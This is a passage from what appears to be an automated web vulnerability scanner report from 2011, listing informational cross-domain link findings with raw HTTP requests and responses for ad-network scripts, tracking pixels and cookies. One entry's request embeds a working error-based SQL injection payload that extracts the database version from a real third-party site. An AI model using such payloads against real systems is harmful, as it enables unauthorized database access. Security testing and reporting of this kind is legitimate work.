var mginformer = '<div class="box"> <ul class="smi-inf" id = "smi-informer"> <li> <a href="http://mgpublications.com/news/37575" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/04/2011042420080728-135026-5951-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/37575" target="_blank">.................., .................... .... .... ............ .. ..........!</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/37570" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/04/20110424880_news_223201-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/37570" target="_blank">........ .................. .............. .. ...................... .................... (........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/37564" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/04/201104241584-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/37564" target="_blank">............ ......................, ...... ...... ....................! </a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/36534" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/03/20110328vanga-15022011-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/36534" target="_blank">.......... ............ ................ ............ .... ........................ ..........?</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/37192" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/04/20110414126306301-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/37192" target="_blank">............ .............. .... ........ ............ .................... .......................... ............</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/26738" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2010/10/20101024lolita-370-10-11-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/26738" target="_blank">............ ................ .................. ............ .. .......... ............</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/30309" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2010/12/20101218702558_3-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/30309" target="_blank">...... ...... .................... ........ ........ .................. (........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/4654" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://imgn.dt00.net/320/320425_b.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/4654" target="_blank">........-............ ...... VIP-........... ...... .......... .............. ........ ........ ................ ....................... </a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/2192" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://imgn.dt00.net/200/200462_b.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/2192" target="_blank">.................... .......... ................ ........: .......... .............................. ...... ........ .. ...................... ........!</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/20803" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2010/07/2010073024-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/20803" target="_blank">........................ ................ ................ ................ .......... .............. .. ........ .......... (........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/31765" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/01/20110112mini-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/31765" target="_blank">................ .... .............. ................!</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/4489" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://imgn.dt00.net/288/288120_b.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/4489" target="_blank">...................... .............. ...................... (..........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/2543" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://imgn.dt00.net/171/171296_b.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/2543" target="_blank">.............. ................ ................ .. ............ (..........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/36653" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/04/20110401961-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/36653" target="_blank">............ ................: .. .......... ...................... ..................!</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/19679" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2010/07/2010070147311636_1249839344_1236164273_i10paradoxatlantidaf10_640-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/19679" target="_blank">........................ ................: .................. ...................... .... ......</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/36386" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/03/2011032520101209chris43-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/36386" target="_blank">................ .............. .................. .. ........................ ........</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/26548" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2010/10/20101021131-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/26548" target="_blank">...... ............ ...... ............? ...... .................. ............ .......... .............. (........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/1731" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://imgn.dt00.net/57/57823_b.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/1731" target="_blank">.............. .................. ...... .... .......................... (........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/34328" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/02/20110220368895_11-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/34328" target="_blank">.............. .............., .............. ........ 2600 ...... .......... (........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/36661" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/04/20110401gallery3_b2f375e8de5fa9f50d040546ed2ab9b41-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/36661" target="_blank">............ .............., ................ .... .............. ............ (........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/37143" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/04/20110414khlopin-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/37143" target="_blank">.................. ............ ...., ...... 150 ...... .... .......... .............. ............</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/34333" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/02/20110220371001_1-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/34333" target="_blank">........ .......... .............. .............. .......... (........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/6218" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://imgn.dt00.net/344/344198_b.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/6218" target="_blank">................ .......... ................ ..................!</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/29388" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2010/12/20101201mini_video-alena-berezovskaja-ja-s-zhenoj-prezidenta-89cc-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/29388" target="_blank">............ ...... .................. "................" .................. ........ (........)</a>
...[SNIP]...
23.54. http://jsc.dt00.net/w/e/webalta.ru.1001.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jsc.dt00.net
Path:   /w/e/webalta.ru.1001.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /w/e/webalta.ru.1001.js?t=1113259 HTTP/1.1
Host: jsc.dt00.net
Proxy-Connection: keep-alive
Referer: http://webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:20:09 GMT
Content-Type: application/x-javascript
Content-Length: 10274
Last-Modified: Fri, 14 Jan 2011 22:38:43 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Wed, 25 May 2011 14:20:09 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

/*marketgid.comV2.1*/var MGDQ1001 = document.getElementById('MarketGidComposite1001'); function MGD011001(MGD02){ if (!document.cookie){ switch (MGD02) { case 'MG_type': case 'MG_id': return null; bre
...[SNIP]...
<div class="mcimage7269"><a target="_blank" href="http://www.marketgid.com/pnews/'+id+'/i/7269/pp/'+MGD001001+'/'+MGDZ1001+'/#k1001" ><img class="mcimage7269" width="75" height="75" src="http://imgn.dt00.net/'+Math.floor(id/1000)+'/'+id+'_m'+ext+'" />
...[SNIP]...
<div class="mctitle7269"><a target="_blank" href="http://www.marketgid.com/pnews/'+id+'/i/7269/pp/'+MGD001001+'/'+MGDZ1001+'/#k1001" class="mctitle7269">'+title+'</a>
...[SNIP]...
<div class="mcimage5925"><a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/5925/pp/'+MGD001001+'/'+MGDZ1001+'/k/'+n[6]+'#k1001" ><img class="mcimage5925" width="75" height="75"src="http://imgg.dt00.net/'+Math.floor(n[1]/1000)+'/'+n[1]+'_m'+(n[2]==2?'.gif':'.jpg')+'" />
...[SNIP]...
<div class="mctitle5925"><a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/5925/pp/'+MGD001001+'/'+MGDZ1001+'/k/'+n[6]+'#k1001" class="mctitle5925">'+MGD065925(n[3])+'</a>
...[SNIP]...
23.55. http://jsc.dt00.net/w/e/webalta.ru.1668.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jsc.dt00.net
Path:   /w/e/webalta.ru.1668.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /w/e/webalta.ru.1668.js?t=1113259 HTTP/1.1
Host: jsc.dt00.net
Proxy-Connection: keep-alive
Referer: http://auto.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:20:13 GMT
Content-Type: application/x-javascript
Content-Length: 10491
Last-Modified: Tue, 28 Dec 2010 09:23:54 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Wed, 25 May 2011 14:20:13 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

/*marketgid.comV2.1*/var MGDQ1668 = document.getElementById('MarketGidComposite1668'); function MGD011668(MGD02){ if (!document.cookie){ switch (MGD02) { case 'MG_type': case 'MG_id': return null; bre
...[SNIP]...
<div class="mcimage8504"><a target="_blank" href="http://www.marketgid.com/pnews/'+id+'/i/8504/pp/'+MGD001668+'/'+MGDZ1668+'/#k1668" ><img class="mcimage8504" width="100" height="75" src="http://imgn.dt00.net/'+Math.floor(id/1000)+'/'+id+'_t100'+ext+'" />
...[SNIP]...
<div class="mctitle8504"><a target="_blank" href="http://www.marketgid.com/pnews/'+id+'/i/8504/pp/'+MGD001668+'/'+MGDZ1668+'/#k1668" class="mctitle8504">'+title+'</a>
...[SNIP]...
<div class="mcimage6906"><a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/6906/pp/'+MGD001668+'/'+MGDZ1668+'/k/'+n[6]+'#k1668" ><img class="mcimage6906" width="100" height="75"src="http://imgg.dt00.net/'+Math.floor(n[1]/1000)+'/'+n[1]+'_t100'+(n[2]==2?'.gif':'.jpg')+'" />
...[SNIP]...
<div class="mctitle6906"><a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/6906/pp/'+MGD001668+'/'+MGDZ1668+'/k/'+n[6]+'#k1668" class="mctitle6906">'+MGD066906(n[3])+'</a>
...[SNIP]...
23.56. http://jsg.dt00.net/m/a/marketgid.com.i5.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jsg.dt00.net
Path:   /m/a/marketgid.com.i5.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /m/a/marketgid.com.i5.js?t=1113 HTTP/1.1
Host: jsg.dt00.net
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:37:23 GMT
Content-Type: application/x-javascript
Content-Length: 4586
Last-Modified: Mon, 21 Mar 2011 23:11:33 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Wed, 25 May 2011 14:37:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

/*marketgid.comV7.9*/ function MGD01310(MGD02){ if (!document.cookie){ document.cookie="MG_310=1;path=/"; if (!document.cookie){ var MGDA=new Date(); return (MGDA.getSeconds()%20+1); } else return 1-1
...[SNIP]...
<div class="hit"> <a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/310/pp/'+MGD00+'/'+MGDZ+'/k/'+n[6]+'" class="desc">'+MGD07310(n[4])+'</a> <a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/310/pp/'+MGD00+'/'+MGDZ+'/k/'+n[6]+'" class="img"><img width="200" height="200"src="http://imgg.dt00.net/'+Math.floor(n[1]/1000)+'/'+n[1]+'_vb'+(n[2]==2?'.gif':'.jpg')+'" /></a> <a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/310/pp/'+MGD00+'/'+MGDZ+'/k/'+n[6]+'" class="title">'+MGD06310(n[3])+'</a> <a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/310/pp/'+MGD00+'/'+MGDZ+'/k/'+n[6]+'" class="price">'+n[7]+'</a>
...[SNIP]...
23.57. http://jsg.dt00.net/m/a/marketgid.com.i59.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jsg.dt00.net
Path:   /m/a/marketgid.com.i59.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /m/a/marketgid.com.i59.js?t=1113 HTTP/1.1
Host: jsg.dt00.net
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:36:22 GMT
Content-Type: application/x-javascript
Content-Length: 4658
Last-Modified: Mon, 21 Mar 2011 23:12:01 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Wed, 25 May 2011 14:36:22 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

/*marketgid.comV7.9*/ function MGD011063(MGD02){ if (!document.cookie){ document.cookie="MG_1063=1;path=/"; if (!document.cookie){ var MGDA=new Date(); return (MGDA.getSeconds()%20+1); } else return 0
...[SNIP]...
<div class="hit"> <a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/1063/pp/'+MGD00+'/'+MGDZ+'/k/'+n[6]+'" class="desc">'+MGD071063(n[4])+'</a> <a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/1063/pp/'+MGD00+'/'+MGDZ+'/k/'+n[6]+'" class="img"><img width="200" height="200"src="http://imgg.dt00.net/'+Math.floor(n[1]/1000)+'/'+n[1]+'_vb'+(n[2]==2?'.gif':'.jpg')+'" /></a> <a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/1063/pp/'+MGD00+'/'+MGDZ+'/k/'+n[6]+'" class="title">'+MGD061063(n[3])+'</a> <a target="_blank" href="http://www.marketgid.com/ghits/'+n[1]+'/i/1063/pp/'+MGD00+'/'+MGDZ+'/k/'+n[6]+'" class="price">'+n[7]+'</a>
...[SNIP]...
23.58. http://learn.shavlik.com/shavlik/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /shavlik/index.cfm?m=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20@@VERSION)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Cookie: CFID=799689; CFTOKEN=67476078
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 25 Apr 2011 12:26:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                                                                           
...[SNIP]...
<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a>
...[SNIP]...
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a>
...[SNIP]...
23.59. http://learn.shavlik.com/shavlik/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /shavlik/index.cfm?pg=374 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
Referer: http://learn.shavlik.com/shavlik/index.cfm?m=1112&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.2.10.1303732848

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:16:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                   
...[SNIP]...
<body>
<img src="http://www.burstnet.com/enlightn/7214//98DD/" width="0" height="0" border="0"><!--- Remarketing Tracking pixel --->
...[SNIP]...
23.60. http://limg.imgsmail.ru/r/js/splash.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://limg.imgsmail.ru
Path:   /r/js/splash.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /r/js/splash.js?7 HTTP/1.1
Host: limg.imgsmail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 25 Apr 2011 14:25:16 GMT
Content-Type: application/x-javascript
Last-Modified: Thu, 20 Jan 2011 13:37:56 GMT
Connection: keep-alive
Expires: Mon, 02 May 2011 14:25:16 GMT
Cache-Control: max-age=604800
Content-Length: 141559

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
);
       tbody = createElement("tbody");
       while (item = res[i++]) {
           (function(str){
               if (j && !str && item.site) {
                   item.site = item.site.replace(/^http:\/\//,'').replace(/\/$/,'');
                   str = '<a onclick="return false;" href="http://go.mail.ru/search?q='+item.site+'&ce=1" title="....... .. '+item.site+'">'+item.site+'</a>
...[SNIP]...
23.61. http://netsuite-www.baynote.net/baynote/tags2/guide/results-products/netsuite-www  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://netsuite-www.baynote.net
Path:   /baynote/tags2/guide/results-products/netsuite-www

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /baynote/tags2/guide/results-products/netsuite-www?userId=6923519460848807096&customerId=netsuite&code=www&id=0&guide=ContentGuide&resultsPerPage=5&referrer=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fpage_not_found.shtml&url=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fecommerce%2Fwebsite-hosting.shtml&appendParams=&rankParam=&condition=d%26g%26s&v=1 HTTP/1.1
Host: netsuite-www.baynote.net
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/products/ecommerce/website-hosting.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: BNServer
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 15:20:58 GMT
Content-Length: 3626


bnTagManager.getTag(0).results = "<div class='bn_g_container' id='bn_guidecontainer0'><div class='bn_g_area' id='bn_guidearea0'><div class='bn_g_welcome' id='bn_guidewelcome0
...[SNIP]...
<div class='bn_g_result_title'><a class='bn_g_result_link' href='http://www.netsuite.com/portal/products/ecommerce/webstore.shtml' title='http://www.netsuite.com/portal/products/ecommerce/webstore.shtml' baynote_bnrank='1' baynote_guide='SimilarDocs' baynote_req='ContentGuide'>Web Store and Shopping Cart </a>
...[SNIP]...
<div class='bn_g_result_title'><a class='bn_g_result_link' href='http://www.netsuite.com/portal/products/ecommerce/main.shtml' title='http://www.netsuite.com/portal/products/ecommerce/main.shtml' baynote_bnrank='2' baynote_guide='SimilarDocs' baynote_req='ContentGuide'>Ecommerce Capability</a>
...[SNIP]...
<div class='bn_g_result_title'><a class='bn_g_result_link' href='http://www.netsuite.com/portal/resource/netsuite_mall/mall.shtml' title='http://www.netsuite.com/portal/resource/netsuite_mall/mall.shtml' baynote_bnrank='3' baynote_guide='SimilarDocs' baynote_req='ContentGuide'>Ecommerce Showcase</a>
...[SNIP]...
<div class='bn_g_result_title'><a class='bn_g_result_link' href='http://www.netsuite.com/portal/products/netsuite/main.shtml' title='http://www.netsuite.com/portal/products/netsuite/main.shtml' baynote_bnrank='4' baynote_guide='SimilarDocs' baynote_req='ContentGuide'>NetSuite Solution Overview</a>
...[SNIP]...
<div class='bn_g_result_title'><a class='bn_g_result_link' href='http://www.netsuite.com/portal/industries/ecommerce.shtml' title='http://www.netsuite.com/portal/industries/ecommerce.shtml' baynote_bnrank='5' baynote_guide='SimilarDocs' baynote_req='ContentGuide'>Ecommerce Edition</a>
...[SNIP]...
23.62. http://nguard.com/vulnerability-assessment/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nguard.com
Path:   /vulnerability-assessment/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /vulnerability-assessment/?gclid=CM2C9p3Pt6gCFUOo4AoduRviBQ HTTP/1.1
Host: nguard.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=74935565.1303732835.1.1.utmgclid=CM2C9p3Pt6gCFUOo4AoduRviBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=74935565.1810353086.1303732835.1303732835.1303732835.1; __utmc=74935565

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:52:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19622


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...
23.63. http://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /serve/fb/pdc?cat=&name=landing&sid=719 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303742441_10164:0_10638:0_10640:0_10641:0_1437:0_1660:562769; uid=1_1303742441_1303179323923:6792170478871670; kwd=1_1303742441_11317:0_11717:0_11718:0_11719:0; sit=1_1303742441_719:0:0_2451:50869:45769_3236:208832:208714_782:563118:562769; cre=1_1303742441; bpd=1_1303742441; apd=1_1303742441; scg=1_1303742441; ppd=1_1303742441; afl=1_1303742441

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:41:11 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1303742471_10164:0_10638:0_10640:0_10641:0_1437:0_1660:562799; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: uid=1_1303742471_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: kwd=1_1303742471_11317:0_11717:0_11718:0_11719:0; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: sit=1_1303742471_719:30:0_2451:50899:45799_3236:208862:208744_782:563148:562799; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: cre=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: bpd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
